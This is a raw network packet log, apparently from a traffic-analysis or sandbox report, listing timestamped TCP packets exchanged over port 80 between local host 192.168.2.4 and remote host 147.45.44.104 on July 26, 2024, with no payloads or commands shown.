Jul 26, 2024 18:56:49.019329071 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.019344091 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.020932913 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.020970106 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.021056890 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.021069050 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.021142006 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.021183968 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.021205902 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.021214962 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.021217108 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.021218061 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.021245956 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.021346092 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.021357059 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.021368027 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.021380901 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.021385908 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.021406889 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.021440983 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.021589041 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.021600008 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.021610022 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.021620035 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.021626949 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.021631002 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.021661043 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.021682024 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.021821976 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.021857023 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.021886110 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.021898031 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.021908045 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.021923065 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.021949053 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.022130013 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.022135019 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.022138119 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.022144079 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.022166967 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.022191048 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.022349119 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.022363901 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.022376060 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.022384882 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.022386074 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.022399902 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.022402048 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.022414923 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.022417068 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.022425890 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.022440910 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.022466898 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.022871971 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.022881985 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.022891045 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.022901058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.022911072 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.022912025 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.022922993 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.022927046 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.022939920 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.022952080 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.022957087 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.022968054 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.022977114 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.022979021 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.022986889 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.022994041 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.022999048 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.023019075 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.023042917 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.023488998 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.023498058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.023507118 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.023516893 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.023526907 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.023528099 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.023538113 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.023547888 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.023554087 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.023561954 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.023571968 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.023572922 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.023585081 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.023588896 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.023596048 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.023607016 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.023617983 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.023618937 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.023628950 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.023638964 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.023643017 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.023649931 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.023659945 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.023660898 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.023670912 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.023675919 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.023701906 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.059350014 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.059453011 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.115705013 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.115748882 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.115761042 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.115818024 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.115869045 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.116249084 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.116261005 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.116271973 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.116282940 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.116296053 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.116307020 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.116318941 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.116329908 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.116343975 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.116354942 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.116365910 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.116377115 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.116389990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.116425991 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.116425991 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.116425991 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.116425991 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.116425991 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.116672039 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.116702080 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.116702080 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.116720915 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.116803885 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.116816998 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.116830111 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.116837025 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.116843939 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.116848946 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.116861105 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.116864920 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.116878033 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.116888046 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.116890907 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.116904020 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.116904974 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.116931915 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.116954088 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.117607117 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.117619991 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.117630005 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.117643118 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.117651939 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.117655993 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.117669106 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.117671967 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.117686033 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.117695093 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.117697954 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.117711067 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.117712021 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.117724895 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.117734909 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.117738962 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.117753029 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.117760897 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.117767096 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.117777109 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.117780924 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.117794037 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.117803097 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.117830992 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.118496895 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.118510962 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.118522882 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.118534088 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.118541956 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.118546009 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.118560076 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.118568897 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.118571997 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.118586063 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.118597031 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.118606091 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.118613005 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.118622065 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.118634939 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.118639946 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.118648052 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.118658066 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.118664980 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.118670940 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.118684053 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.118685007 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.118697882 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.118710041 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.118710995 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.118729115 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.118751049 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.119333029 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.119345903 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.119357109 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.119369984 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.119379044 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.119383097 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.119396925 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.119407892 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.119409084 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.119421959 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.119425058 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.119435072 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.119446993 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.119452000 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.119460106 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.119471073 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.119482994 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.119482994 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.119496107 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.119498968 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.119509935 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.119523048 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.119548082 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.119854927 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.119868040 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.119891882 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.119918108 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.120141029 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.120153904 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.120166063 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.120182037 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.120198965 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.120291948 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.120304108 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.120316029 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.120326996 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.120327950 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.120340109 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.120352983 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.120354891 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.120367050 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.120393991 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.120410919 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.120444059 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.120456934 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.120488882 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.120510101 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.120686054 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.120697975 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.120712042 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.120722055 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.120726109 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.120734930 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.120743990 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.120748043 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.120762110 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.120773077 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.120773077 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.120784998 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.120786905 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.120798111 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.120811939 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.120816946 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.120824099 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.120836973 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.120839119 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.120862961 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.120886087 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.121170044 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.121182919 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.121196032 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.121207952 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.121222973 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.121237993 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.121248007 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.121260881 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.121272087 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.121284008 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.121284008 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.121295929 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.121299028 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.121320963 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.121344090 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.206496000 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.206521034 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.206532955 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.206543922 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.206557035 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.206567049 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.206578016 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.206578016 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.206589937 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.206625938 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.206651926 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.206726074 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.206763983 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.206846952 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.206887007 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.206944942 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.206957102 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.206980944 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.206998110 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.207015038 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.207026005 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.207036018 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.207046986 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.207051992 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.207058907 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.207068920 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.207098007 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.207400084 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.207412004 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.207422018 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.207432985 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.207442045 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.207461119 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.207480907 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.207655907 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.207694054 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.207767963 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.207779884 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.207789898 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.207801104 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.207808018 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.207818031 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.207825899 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.207829952 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.207840919 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.207854986 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.207879066 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.208375931 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.208385944 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.208395958 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.208411932 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.208411932 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.208430052 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.208437920 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.208440065 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.208451033 CEST	80	49757	147.45.44.104	192.168.2.4
